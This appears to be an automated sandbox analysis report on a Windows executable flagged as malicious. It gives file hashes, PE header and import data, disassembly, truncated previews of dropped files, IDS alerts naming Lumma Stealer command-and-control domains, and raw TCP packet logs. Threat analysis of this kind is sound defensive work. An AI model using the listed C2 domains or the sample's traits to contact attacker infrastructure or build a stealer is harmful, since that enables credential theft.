Preview:	.... ...........................\|...<...............0...........\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

C:\Windows\System32\SecurityHealthSystray.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.945868784648335
Encrypted:	false
SSDEEP:	48:6/prPtxM7Jt8Bs3FJsdcV4MKe27+KvqBHOOulajfqXSfbNtm:CPwPc+Vx9MlvkocjRzNt
MD5:	979EA2FAC2E52FBB0B1704B4F75E9468
SHA1:	F2A5D40B8BEC47D950FF20D42ADDC97DFD9BF883
SHA-256:	FE02E01915FC099063FE15880A49B85F50906E5EBA8BF51FEB6C890E01D605F7
SHA-512:	B521488CD44FAB4ACFF2E8C8EE83BC0A4576340C4C9BEDE5D4139DAA73744C7EDCDDE02126C5FC98C0FBAC21DCBB38CB3442FE267FD8756B607F702D063441EE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(.....0..!.......r...pre..p.{....(....(....&..&......................0..........ri..p(....&..&......................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(......(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Preview:	012340..1..2..3..4.....

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.6048426069826895
Encrypted:	false
SSDEEP:	12:P9+C5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:cMdUOAokItULVDv
MD5:	D510E22CA3F4F1945E85960DFC3DFA92
SHA1:	4552001C0766EC619ACBFF204270C1B6E663A654
SHA-256:	16BB818463E168FD5E14C909C59EF05007D8CC96233DD350B40D3C6B1BBB6AA2
SHA-512:	C9F6CC22C836E86EF018D2B9246BDC432A4F3775FA133FE9984A2EE5FE39129D9EA5AA67CE555C24EC6818CDC18B4E508051D0EFCA1CF4357F783AB901F75558
Malicious:	false
Preview:	..Pinging 980108 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.722906589964808
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	seoI30IZZr.exe
File size:	637'952 bytes
MD5:	d0e53e2a0bef6c93e0ccad47a650079d
SHA1:	8e69fc482c058749cc7974e94ad7d571fca6ccf2
SHA256:	26406c587a518c9b6ab8fd95252cbb347b853f9f5fd0f2b287f8bcd2d9905e34
SHA512:	4377d1a2e3c3ef2065b445f004cb9e2853bfc12f35e38315013c02b45e0c6059cb1e5d5200875026de358cc91b51b6f2c13ed9fd92b49a10f7d67267e8216f48
SSDEEP:	12288:RE+F1v/+mon5DpjiNb58UxCj2AqeMQmHnJpaWH:/7/+v5UNb58uGKFHnJpZ
TLSH:	66D49D5573A54BA4D2B6613894BBA317F737B80817358ADB63D040643FE23E05EBBB12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8..aV..aV..aV......aV...W..aV...U..aV...R..aV...S..aV...W..aV..aW..`V..._..aV......aV...T..aV.Rich.aV........................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14004d28c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0CB3A [Mon Sep 23 01:58:18 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	11c012ef8b8b753a6c7dfac749804464

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F2FACDD847Ch
dec eax
add esp, 28h
jmp 00007F2FACDD7DA7h
int3
int3
dec eax
mov dword ptr [esp+10h], ebx
dec eax
mov dword ptr [esp+18h], esi
push ebp
push edi
inc ecx
push esi
dec eax
mov ebp, esp
dec eax
sub esp, 10h
xor eax, eax
xor ecx, ecx
cpuid
inc esp
mov eax, ecx
inc esp
mov edx, edx
inc ecx
xor edx, 49656E69h
inc ecx
xor eax, 6C65746Eh
inc esp
mov ecx, ebx
inc esp
mov esi, eax
xor ecx, ecx
mov eax, 00000001h
cpuid
inc ebp
or edx, eax
mov dword ptr [ebp-10h], eax
inc ecx
xor ecx, 756E6547h
mov dword ptr [ebp-0Ch], ebx
inc ebp
or edx, ecx
mov dword ptr [ebp-08h], ecx
mov edi, ecx
mov dword ptr [ebp-04h], edx
jne 00007F2FACDD7F8Dh
dec eax
or dword ptr [00030D9Dh], FFFFFFFFh
and eax, 0FFF3FF0h
dec eax
mov dword ptr [00030D85h], 00008000h
cmp eax, 000106C0h
je 00007F2FACDD7F5Ah
cmp eax, 00020660h
je 00007F2FACDD7F53h
cmp eax, 00020670h
je 00007F2FACDD7F4Ch
add eax, FFFCF9B0h
cmp eax, 20h
jnbe 00007F2FACDD7F56h
dec eax
mov ecx, 00010001h
add dword ptr [eax], eax
add byte ptr [eax], al
dec eax
bt ecx, eax
jnc 00007F2FACDD7F46h
inc esp
mov eax, dword ptr [0004D21Fh]
inc ecx
or eax, 01h
inc esp
mov dword ptr [0004D214h], eax

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7b7dc	0x1a4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x1e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x9b000	0x2dfc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9f000	0x240	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x751c0	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x75280	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x75080	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x50000	0x850	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4e417	0x4e600	488d6825be90b0deec8f95e2517395e0	False	0.49077639055023925	data	6.496684323663845	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x50000	0x2dc1c	0x2de00	c47f95cc9eaf35dc9eff9da1925851c7	False	0.7468547769073569	dBase III DBT, version number 0, next free block index 509838, 1st item "\356\301\007"	6.925412149747705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x1cca8	0x1c000	49039aff1d6c3a9a98ec08d65b5ceb5b	False	0.4547206333705357	data	5.381399126314764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x9b000	0x2dfc	0x2e00	62b35584c7b99e38dc903e4e4c13756c	False	0.47316576086956524	data	5.740105168001118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x9e000	0x1e8	0x200	47073ab0f41674365afed1b0d7cc6cd5	False	0.54296875	data	4.768131151703051	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9f000	0x240	0x400	3951977efcb66bc5bb67c5f34cdd601c	False	0.3974609375	data	3.6128407531251083	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x9e060	0x188	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5892857142857143

Imports

DLL	Import
d3d9.dll	Direct3DCreate9Ex
KERNEL32.dll	VirtualFree, GetCurrentProcess, OutputDebugStringA, DeviceIoControl, VirtualAlloc, Thread32Next, Thread32First, CreateFileW, GetCurrentThreadId, GetModuleHandleA, CreateToolhelp32Snapshot, MultiByteToWideChar, Sleep, GetLastError, GetCurrentThread, LoadLibraryA, Process32Next, CloseHandle, K32GetModuleBaseNameA, CreateThread, HeapSetInformation, GetThreadContext, GetProcAddress, GetCurrentProcessId, GetProcessHeap, WideCharToMultiByte, lstrcmpiA, K32EnumProcessModules, GetTickCount, OpenThread, IsDebuggerPresent, CheckRemoteDebuggerPresent, SetLastError, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, VirtualProtect, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetModuleHandleW, GetSystemTimeAsFileTime, InitializeSListHead, LocalFree, FormatMessageA, GetLocaleInfoEx, FindClose, FindFirstFileW, GetFileAttributesExW, AreFileApisANSI, GetFileInformationByHandleEx, Process32First, QueryPerformanceCounter, QueryPerformanceFrequency, GlobalUnlock, GlobalLock, GlobalFree, GlobalAlloc, ReleaseSRWLockExclusive, UnhandledExceptionFilter
USER32.dll	GetActiveWindow, SetClipboardData, ScreenToClient, LoadCursorA, GetKeyState, SendInput, UpdateWindow, GetClipboardData, EmptyClipboard, RegisterClassExA, FindWindowA, GetDesktopWindow, PeekMessageA, LoadIconA, mouse_event, TranslateMessage, ClientToScreen, CreateWindowExA, DefWindowProcA, SetCursor, GetForegroundWindow, MessageBoxA, SetWindowLongA, CloseClipboard, OpenClipboard, GetCursorPos, SetCursorPos, GetAsyncKeyState, ShowWindow, GetSystemMetrics, SetWindowPos, SetLayeredWindowAttributes, GetClientRect, DestroyWindow, GetWindowRect, GetWindow, DispatchMessageA
ADVAPI32.dll	OpenProcessToken, GetTokenInformation
IMM32.dll	ImmReleaseContext, ImmSetCompositionWindow, ImmGetContext
MSVCP140.dll	_Query_perf_frequency, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?uncaught_exceptions@std@@YAHXZ, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A, ?_Winerror_map@std@@YAHH@Z, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z, ?_Random_device@std@@YAIXZ, ?_Xlength_error@std@@YAXPEBD@Z, ?_Syserror_map@std@@YAPEBDH@Z, _Query_perf_counter, _Thrd_detach, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD@Z, ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D@Z, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z, ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z, ??1?$basic_istream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEA_N@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z, ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAM@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ
ntdll.dll	RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind
dwmapi.dll	DwmExtendFrameIntoClientArea
VCRUNTIME140_1.dll	__CxxFrameHandler4
VCRUNTIME140.dll	__std_terminate, memchr, strstr, memcmp, memcpy, __std_exception_destroy, __std_exception_copy, memmove, __current_exception, __current_exception_context, __C_specific_handler, _CxxThrowException, memset
api-ms-win-crt-stdio-l1-1-0.dll	__p__commode, _fseeki64, fsetpos, ungetc, _get_stream_buffer_pointers, setvbuf, fgetpos, fclose, __acrt_iob_func, __stdio_common_vsnprintf_s, fflush, fgetc, ftell, fputc, _set_fmode, fseek, __stdio_common_vsprintf_s, __stdio_common_vfprintf, __stdio_common_vsscanf, fread, __stdio_common_vsprintf, _wfopen, fwrite
api-ms-win-crt-string-l1-1-0.dll	strncpy, isprint, strcmp, _stricmp
api-ms-win-crt-utility-l1-1-0.dll	qsort, rand
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, _callnewh, free, malloc
api-ms-win-crt-convert-l1-1-0.dll	atof
api-ms-win-crt-runtime-l1-1-0.dll	system, _beginthreadex, terminate, abort, _invalid_parameter_noinfo_noreturn, _register_thread_local_exe_atexit_callback, _c_exit, __p___argv, __p___argc, _exit, _initterm_e, _initterm, _get_initial_narrow_environment, _set_app_type, _seh_filter_exe, _cexit, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _initialize_narrow_environment, _configure_narrow_argv, exit
api-ms-win-crt-math-l1-1-0.dll	atan2, atan2f, ceilf, cosf, asin, fmodf, pow, tanf, powf, sqrtf, __setusermatherr, floorf, sinf, sqrt
api-ms-win-crt-filesystem-l1-1-0.dll	_unlock_file, _lock_file
api-ms-win-crt-locale-l1-1-0.dll	___lc_codepage_func, _configthreadlocale
SHELL32.dll	ShellExecuteW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-30T18:19:16.762080+0200	2056172	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop)	1	192.168.2.8	55029	1.1.1.1	53	UDP
2024-09-30T18:19:16.780192+0200	2056054	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop)	1	192.168.2.8	58540	1.1.1.1	53	UDP
2024-09-30T18:19:16.793557+0200	2056040	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop)	1	192.168.2.8	55461	1.1.1.1	53	UDP
2024-09-30T18:19:16.808005+0200	2056056	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop)	1	192.168.2.8	53563	1.1.1.1	53	UDP
2024-09-30T18:19:16.819790+0200	2056036	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop)	1	192.168.2.8	50741	1.1.1.1	53	UDP
2024-09-30T18:19:16.832660+0200	2056058	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop)	1	192.168.2.8	61329	1.1.1.1	53	UDP
2024-09-30T18:19:16.845073+0200	2056046	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop)	1	192.168.2.8	55758	1.1.1.1	53	UDP
2024-09-30T18:19:16.858485+0200	2056042	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop)	1	192.168.2.8	50670	1.1.1.1	53	UDP
2024-09-30T18:19:16.869633+0200	2056052	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop)	1	192.168.2.8	59161	1.1.1.1	53	UDP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:19:11.250468016 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.250484943 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.250560045 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.287185907 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.287203074 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.756845951 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.756968975 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.761209011 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.761220932 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.761507034 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.784528017 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.831403971 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911067963 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911118031 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911145926 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911174059 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911207914 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911237001 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.911242962 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911252022 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.911257982 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911300898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.911370993 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.911411047 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.911420107 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.915750027 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.915786982 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.915815115 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.915824890 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.915868998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.998395920 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998461008 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998488903 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998517036 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998526096 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.998538017 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998560905 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.998835087 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998871088 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998897076 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.998903990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.998944998 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.998994112 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999059916 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999116898 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.999123096 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999695063 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999725103 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999739885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.999746084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999784946 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.999790907 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999828100 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:11.999876976 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:11.999886990 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000631094 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000660896 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000679016 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.000684977 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000722885 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.000729084 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000766039 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.000827074 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.000838041 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.001571894 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.001641035 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.001647949 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.055773973 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.085905075 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.085983038 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086009026 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086035967 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086054087 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086062908 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086077929 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086431026 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086489916 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086496115 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086566925 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086569071 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086577892 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086631060 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086654902 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.086690903 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.086697102 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.087469101 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.087541103 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.087548018 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.087641001 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.087918997 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.087990046 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.088063002 CEST	443	49706	188.114.96.3	192.168.2.8
Sep 30, 2024 18:19:12.088125944 CEST	49706	443	192.168.2.8	188.114.96.3
Sep 30, 2024 18:19:12.088231087 CEST	443	49706	188.114.96.3	192.168.2.8
